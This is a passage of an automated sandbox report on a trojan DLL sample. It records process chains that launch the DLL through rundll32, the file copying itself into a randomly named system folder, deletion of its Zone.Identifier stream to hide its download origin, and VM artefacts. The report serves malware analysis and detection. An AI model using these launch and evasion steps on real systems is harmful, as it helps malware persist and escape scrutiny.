Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDCC3F	13_2_00BDCC3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC3E3B	13_2_00BC3E3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD0A37	13_2_00BD0A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD0824	13_2_00BD0824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDBA18	13_2_00BDBA18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE2C16	13_2_00BE2C16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD1C12	13_2_00BD1C12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCF20D	13_2_00BCF20D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDE478	13_2_00BDE478
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE1C71	13_2_00BE1C71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE0C66	13_2_00BE0C66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD645F	13_2_00BD645F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD604E	13_2_00BD604E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC33A9	13_2_00BC33A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD77A7	13_2_00BD77A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDBFA1	13_2_00BDBFA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC938F	13_2_00BC938F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCF984	13_2_00BCF984
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE1987	13_2_00BE1987
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC7D87	13_2_00BC7D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC6BFE	13_2_00BC6BFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDD5FE	13_2_00BDD5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC1DF9	13_2_00BC1DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD91F7	13_2_00BD91F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCB7EC	13_2_00BCB7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCFBEF	13_2_00BCFBEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE35E3	13_2_00BE35E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD13DB	13_2_00BD13DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDE7DA	13_2_00BDE7DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD89DA	13_2_00BD89DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD4DC5	13_2_00BD4DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD0FC5	13_2_00BD0FC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC2DC5	13_2_00BC2DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC5DC3	13_2_00BC5DC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC39C3	13_2_00BC39C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC7739	13_2_00BC7739
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD473A	13_2_00BD473A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCE336	13_2_00BCE336
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD3130	13_2_00BD3130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDCF2C	13_2_00BDCF2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCB12E	13_2_00BCB12E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC6125	13_2_00BC6125
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD8518	13_2_00BD8518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC5314	13_2_00BC5314
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC4716	13_2_00BC4716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC8112	13_2_00BC8112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD710D	13_2_00BD710D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDD10B	13_2_00BDD10B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE3306	13_2_00BE3306
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC2B7C	13_2_00BC2B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD5B7C	13_2_00BD5B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC597D	13_2_00BC597D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC2575	13_2_00BC2575
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC2176	13_2_00BC2176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDC772	13_2_00BDC772
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC996C	13_2_00BC996C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC196D	13_2_00BC196D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC9565	13_2_00BC9565
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC5166	13_2_00BC5166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCDD66	13_2_00BCDD66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDF561	13_2_00BDF561
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE2560	13_2_00BE2560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC635F	13_2_00BC635F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC8D59	13_2_00BC8D59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE2D4F	13_2_00BE2D4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE314A	13_2_00BE314A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDC145	13_2_00BDC145
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC4F42	13_2_00BC4F42

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6ECC1C10 appears 97 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6ECDD350 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6ECC1C10 appears 97 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6ECDD350 appears 33 times

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: TYLNb8VvnmYA.dll

Virustotal: Detection: 25%

Source: TYLNb8VvnmYA.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",#1
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",#1
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,axamexdrqyrgb
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,bhramccfbdd
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gipupxhph\siawepkk.qzv",iJIySwmeuqOefH
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5808 -ip 5808
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 304
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5808 -ip 5808
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 324
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gipupxhph\siawepkk.qzv",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,axamexdrqyrgb	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,bhramccfbdd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gipupxhph\siawepkk.qzv",iJIySwmeuqOefH	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gipupxhph\siawepkk.qzv",Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5808 -ip 5808	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 304	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5808 -ip 5808	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 324	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB9F.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winDLL@43/16@0/29

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,Control_RunDLL

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:3644:64:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:6424:64:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2532:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5808

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: TYLNb8VvnmYA.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: TYLNb8VvnmYA.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.564262336.0000000002CDC000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.564338368.0000000002CA9000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.564358097.0000000002CA9000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.564338368.0000000002CA9000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.564358097.0000000002CA9000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.564520249.0000000002C9D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.564326548.0000000002C9D000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.585713559.000000000320C000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.586254473.000000000320C000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000016.00000002.578653087.00000000005E2000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.564520249.0000000002C9D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.564326548.0000000002C9D000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.585713559.000000000320C000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.586254473.000000000320C000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE9153 push ecx; ret	0_2_6ECE9166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECE9153 push ecx; ret	4_2_6ECE9166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F150F push ds; ret	5_2_010F1527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F151C push ds; ret	5_2_010F1527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111151C push ds; ret	8_2_01111527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111150F push ds; ret	8_2_01111527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC151C push ds; ret	13_2_00BC1527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC150F push ds; ret	13_2_00BC1527

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6ECCE4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

0_2_6ECCE4E0

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Gipupxhph\siawepkk.qzv

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Gipupxhph\siawepkk.qzv:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	API coverage: 6.9 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 7.6 %

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE2FE7 FindFirstFileExW,		0_2_6ECE2FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECE2FE7 FindFirstFileExW,		4_2_6ECE2FE7

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: Amcache.hve.22.dr	Binary or memory string: VMware
Source: Amcache.hve.22.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
